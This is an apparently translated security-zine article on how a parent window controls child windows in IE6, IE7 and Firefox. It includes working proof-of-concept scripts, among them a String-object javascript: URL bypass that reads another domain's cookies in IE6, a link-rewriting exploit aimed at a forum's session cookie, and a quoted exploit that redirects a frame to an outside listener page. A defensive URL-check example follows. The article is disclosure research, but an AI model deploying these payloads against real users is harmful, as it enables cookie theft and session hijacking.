                          ==Ph4nt0m Security Team==
 
                       Issue 0x02, Phile #0x04 of 0x0A
 

|=---------------------------------------------------------------------------=|
|=---------------------=[ A Brief Look at ... Security ]=--------------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=-----------------------=[         By rayh4c        ]=----------------------=|
|=----------------------=[    <rayh4c_at_80sec.com>   ]=---------------------=|
|=---------------------------------------------------------------------------=|


    Manuel Caballero presented "A Resident in My Domain" at BlueHat. I kept
thinking about the problem it raised and started writing some related material
on my blog, and at the time it was being discussed constantly in the HI group.
My view was that the relationship between a parent page and its child pages is a
very important aspect of this, so I went through it page by page and also ran
some security tests on the parent page's control over its children.

1. Pseudo-protocols

    In JavaScript we work with window objects all the time, and in a window
opened through window.open we can execute a pseudo-protocol (a javascript: URL).

    Set up a local web server and start with a first experiment:

    Visit http://127.0.0.1/test.htm; the script in test.htm is:

    <script>   
    x=window.open('about:blank');
    x.location="javascript:alert(document.domain)"
    </script>

    Results:

    IE6: the pseudo-protocol executes; document.domain is 127.0.0.1
    IE7: the pseudo-protocol executes; document.domain is 127.0.0.1
    Firefox: the pseudo-protocol executes, but document.domain is NULL, since
    for a bare IP address there is no domain

    This looks like a Firefox bug as well: with an IP address Firefox does not
treat the host as a domain, yet in practice the potential for abuse is still
there.

    To take this further, I looked at the relationship between a page and the
windows it pops up, and used the original window to run experiments across pages
to verify the following:

    The parent page and the child page are different pages; the parent page
redirects the child page's URL and then executes a pseudo-protocol in it.


2. The relationship between parent and child pages

    After a parent page opens a child page, does the parent still have control
over the child?

    Test: visit http://127.0.0.1/test2.htm; the script in test2.htm is:

    <script>
    x=window.open('about:blank');
    x.location="http://www.163.com" // navigate the child window to the 163 site
    setTimeout(function(){
        x.location="http://127.0.0.1";
    },5000)  // after 5 seconds, redirect the child window to 127.0.0.1
    </script>

    IE6, IE7 and Firefox all behave the same: the child page opens the 163 site
and, five seconds later, jumps to 127.0.0.1.

    So even after the child page has navigated to another domain, it is still
under the parent page's control.


3. Across domains

    What happens when the parent page executes a pseudo-protocol in a child page
that has navigated to some other domain?

    Visit http://127.0.0.1/test3.htm; the script in test3.htm is:

    <script>   
    x=window.open('about:blank');
    x.location="http://www.163.com"
    setTimeout(function(){
        x.location="javascript:alert(document.cookie)";
    },5000)
    </script>

    Results:

    IE6: no response.
    IE7: access denied.
    Firefox: alert is not defined.

    This tells us that when the parent page and the child page are not on the
same domain, the parent cannot execute pseudo-protocol script in the child.

    To further verify that it does work when parent and child are on the same
domain, test:

    Visit http://127.0.0.1/test4.htm; the script in test4.htm is:

    <script>
    document.cookie='xss:true'  // set a test cookie: xss:true
    x=window.open('about:blank');
    x.location="http://127.0.0.1"
    setTimeout(function(){
        x.location="javascript:alert(document.cookie)";
    },5000)
    </script>

    IE6, IE7 and Firefox all pop up the cookie value that was set, which shows
that when the parent and child pages are on the same domain, the parent can
execute pseudo-protocol script in the child.


4. Testing the security of this relationship

    With the parent/child relationship this subtle, security testing can begin.
PDP, who is very good at this, gave the following EXP when he looked at the
parent/child page issue:

    javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return 'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);

    What is worth noting in this EXP:

    Parent page A opens child page B, a page containing frames; the parent page
can control the URL of the frame inside B and redirect it to the attacker's
target.

    The key to the parent being able to control the child's frames is that
window.frames[0] is not restricted; the second key is the address that location
is pointed at, which here is not a plain string.

    Following this idea and building on test 3, I made the address assigned to
location a new String() instead:

    Visit http://127.0.0.1/test5.htm; the script in test5.htm is:

    <script>   
    x=window.open('about:blank');
    x.location="http://www.163.com"
    setTimeout(function(){
        x.location=new String("javascript:alert(document.cookie)")
    },5000)
    </script>

    IE6: pops up the COOKIE.
    IE7: access denied.
    Firefox: alert is not defined.

    IE6 popped up the cross-domain cookie: the script was executed across
domains.
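    The bypass in tests 4 and 5 works because the value handed to location is
not a primitive string: a String object or an object with its own toString
method gets past a check that looks at the type, yet the browser still
stringifies it when it navigates. The following is an added example (not code
from the original article or from the authors it cites) written from the
defender's side: a naive navigation-sink check, the hardened version that
coerces first and then compares the scheme, and a constructed set of inputs
mirroring the article's tests. It goes a little beyond the article by also
stripping leading control characters, which browsers ignore before the scheme.
All function names and sample inputs are constructed for this example.

```javascript
// Added example: checking a value before it is assigned to a window's location.
// Function names and sample inputs are constructed for this demonstration.

// Naive check: only rejects javascript: when the value is a primitive string.
// A String object or a {toString} object slips through because typeof is
// 'object', yet the browser will still stringify it when it navigates.
function naiveIsSafeNavigation(value) {
  if (typeof value === 'string') {
    return !/^\s*javascript:/i.test(value);
  }
  return true; // non-strings are (wrongly) assumed harmless
}

// Hardened check: coerce first, the same way the navigation sink does, then
// strip leading control/whitespace characters and compare the scheme against
// an allow-list instead of a deny-list.
function hardenedIsSafeNavigation(value) {
  let s;
  try {
    s = String(value);            // invokes toString/valueOf like the sink would
  } catch (e) {
    return false;                 // a throwing toString is not a URL we want
  }
  // Browsers ignore leading C0 controls and whitespace before the scheme.
  s = s.replace(/^[\u0000-\u0020]+/, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  if (!m) return true;            // relative URL: no scheme to abuse
  const scheme = m[1].toLowerCase();
  return scheme === 'http' || scheme === 'https';
}

// Constructed sample inputs mirroring the article's tests.
const SAMPLE_INPUTS = [
  'http://127.0.0.1/',
  'javascript:alert(document.cookie)',
  new String('javascript:alert(document.cookie)'),
  { toString: function () { return 'javascript:alert(document.cookie)'; } },
  '\u0001javascript:alert(1)',
];

// Runs one check over every sample input and returns the verdicts in order.
function evaluateAll(check) {
  return SAMPLE_INPUTS.map(check);
}

console.log('naive   :', evaluateAll(naiveIsSafeNavigation));
console.log('hardened:', evaluateAll(hardenedIsSafeNavigation));
```

    The naive check only flags the second input; the hardened one flags
everything except the plain http URL, because the coercion happens before the
comparison rather than being left to the browser.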

5. The consequences

    Does this count as an IE6 0DAY? To a certain degree it is completely
universal. EXP:

    <a href="">IE6 Cross Domain Scripting</a>
    <script>
    function win(){
        x=window.open('http://www.phpwind.net');
        setTimeout(function(){
            x.location=new String("javascript:alert(document.cookie)")
        },3000)
    }
    window.onload=function(){
        for (i=0;i<document.links.length;i++) { 
            document.links[i].href="javascript:win()"
        }
    }
    </script>

    Clicking the link pops up the PHPWIND forum's COOKIE, which means that
through an attack like this a hacker can obtain the cookies of any site and
then hijack the user's session.

    This vulnerability is effectively an XSS that the website itself cannot
patch; a site can only do some hardening of client-side session security, for
example using SSL connections, the secure cookie flag, HTTPONLY, session
watermarking, and so on.


6. Summary

    The root of the security problem lies in how window operations are handled:
the flaw never considered that windows related by inheritance change over time,
and only put a few restrictions on the operations on a window; once those
restrictions are bypassed, script can be executed.

    This vulnerability also shows some of IE7's new security features: IE7
checks script execution and pseudo-protocols in windows related by inheritance,
and has started restricting this kind of attack.

    That does not solve the security problem at its root, though. IE7 merely
restricts the operation of executing script across domains; the parent's
control over the child page's URL can still be seen in IE7, whereas Firefox
does not show the same problem, which says that different browsers also differ
a great deal in their security considerations.

    Many of the tricks against IE have already been blocked. Following the line
of thinking in this article, I should be able to dig out a few more
vulnerabilities.

    Thanks to the friends in the HI group who discussed this together with me.

7. References

[1] Browser's Ghost Busters: http://sirdarckcat.blogspot.com/2008/05/browsers-ghost-busters.html
[2] Ghost Busters: http://www.gnucitizen.org/blog/ghost-busters/

-EOF-